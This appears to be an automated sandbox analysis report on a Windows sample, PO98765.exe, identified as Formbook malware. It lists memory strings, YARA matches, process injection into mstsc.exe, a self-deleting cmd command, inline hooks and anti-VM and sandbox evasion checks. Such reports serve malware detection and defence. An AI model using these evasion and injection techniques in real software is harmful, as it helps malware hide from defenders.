          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA3798
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA8EF8
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA2080
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BA1468
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BBBF38
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BBB530
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_003567E9
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D853
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D38E
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00402D88
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00409E30
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041E73A
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DF900
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F4120
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591002
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015AE824
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A28EC
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB090
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A20A8
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A2B28
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015903DA
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159DBD2
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150EBB0
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A22AE
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A1D55
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A2D07
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D0D20
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A25DD
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014ED5E0
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01502581
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159D466
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E841F
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015ADFCE
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A1FF1
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159D616
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F6E30
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A2EF7
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00AB67E9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05100D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D25DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CD466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CD616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05126E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D28EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CDBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D853
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D816
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D38E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72D88
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C79E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C72FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8E73A
          Source: C:\Users\user\Desktop\PO98765.exeCode function: String function: 014DB150 appears 45 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0510B150 appears 35 times
          Source: PO98765.exeBinary or memory string: OriginalFilename vs PO98765.exe
          Source: PO98765.exe, 00000000.00000002.677683735.0000000000352000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: PO98765.exe, 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs PO98765.exe
          Source: PO98765.exeBinary or memory string: OriginalFilename vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.715044726.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.717371551.0000000003263000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs PO98765.exe
          Source: PO98765.exe, 00000001.00000002.716576209.00000000015CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO98765.exe
          Source: PO98765.exeBinary or memory string: OriginalFilenameBfRf.exe@ vs PO98765.exe
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO98765.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\PO98765.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO98765.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: PO98765.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO98765.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO98765.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO98765.exeVirustotal: Detection: 14%
          Source: PO98765.exeReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Users\user\Desktop\PO98765.exe 'C:\Users\user\Desktop\PO98765.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO98765.exeProcess created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: C:\Users\user\Desktop\PO98765.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\PO98765.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO98765.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO98765.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.933997672.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO98765.exe, 00000001.00000002.716163299.00000000014B0000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.924756958.00000000051FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO98765.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: PO98765.exe, 00000001.00000002.717167933.0000000003140000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: PO98765.exe, 00000001.00000002.717167933.0000000003140000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.933997672.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: PO98765.exe, erSe.cs.Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.PO98765.exe.350000.0.unpack, erSe.cs.Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.PO98765.exe.350000.0.unpack, erSe.cs.Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.PO98765.exe.ab0000.1.unpack, erSe.cs.Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.PO98765.exe.ab0000.0.unpack, erSe.cs.Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_02666408 push 8B5500CBh; retf
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_02666550 pushad ; retf
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BB6DDC pushad ; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BB4C0F pushfd ; retf
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 0_2_05BB4BC7 push es; retf
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041C802 push esi; iretd
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041E172 pushfd ; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_004182CC push cs; retf
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041E4F5 push dword ptr [537421FAh]; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00419C92 pushfd ; iretd
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0041674D push 8EAE14C8h; iretd
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_004167AE push C6E9D42Ah; ret
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0152D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0515D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D0CB push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D0C2 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D075 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8C802 push esi; iretd
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8E172 pushfd ; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8D12C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C882CC push cs; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8E4F5 push dword ptr [537421FAh]; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C89C92 pushfd ; iretd
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C867AE push C6E9D42Ah; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00C8674D push 8EAE14C8h; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.32069962776

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE3
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO98765.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PO98765.exe PID: 484, type: MEMORY
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\PO98765.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO98765.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO98765.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000C798E4 second address: 0000000000C798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000C79B4E second address: 0000000000C79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO98765.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\PO98765.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\PO98765.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\PO98765.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\PO98765.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\PO98765.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO98765.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO98765.exe TID: 2740Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\PO98765.exe TID: 4868Thread sleep time: -52388s >= -30000s
          Source: C:\Users\user\Desktop\PO98765.exe TID: 6068Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2016Thread sleep time: -56000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 4600Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: PO98765.exe, 00000000.00000002.682453988.0000000006220000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.700168754.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.696931835.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.700168754.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.700882472.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAb
          Source: explorer.exe, 00000002.00000002.931560810.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
